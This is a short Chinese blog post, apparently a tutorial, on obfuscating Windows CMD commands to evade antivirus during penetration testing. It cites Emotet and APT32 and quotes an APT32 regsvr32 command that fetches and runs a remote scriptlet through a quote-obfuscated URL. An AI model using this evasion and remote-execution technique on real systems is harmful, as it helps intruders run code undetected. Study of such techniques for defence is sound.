您当前的位置: 首页 > 

wespten

暂无认证

  • 1浏览

    0关注

    899博文

    0收益

  • 0浏览

    0点赞

    0打赏

    0留言

私信
关注
热门博文

CMD命令混淆

wespten 发布时间:2022-08-11 23:55:21 ,浏览量:1

一、CMD命令混淆简介

CMD中有许多的特殊字符,都有一定的特殊功能,我们将这些特殊字符拼接进命令中,并不影响命令本身的执行。可能达到绕过杀软的效果。在内网渗透的时候,执行CMD命令难免会被杀软拦截,因为杀软规则库的不同,可能会体现出不同的效果。

首先举几个现实中的例子:

1. Emotet木马

Emotet一款著名的银行木马,首次出现于2014年年中。该木马主要通过垃圾邮件的方式传播感染目标用户,并通过脚本混淆、加密或编码方式来绕过AV检测,比如在垃圾邮件word附件中使用宏攻击, 如下图所示,这是一个从DOC文档嵌入的VBA宏代码中提取的CMD命令,乍一看上去,像是无意义的一串字符:

2. APT32

APT32在使用regsvr32.exe 远程注册组件,使用混淆方式来逃避C2检测:

regsvr32.exe /s /n /u /i:”h”t”t”p://.jpg scrobj.dll

3. FIN7

关注
打赏
1665965058
查看更多评论
立即登录/注册

微信扫码登录

0.0459s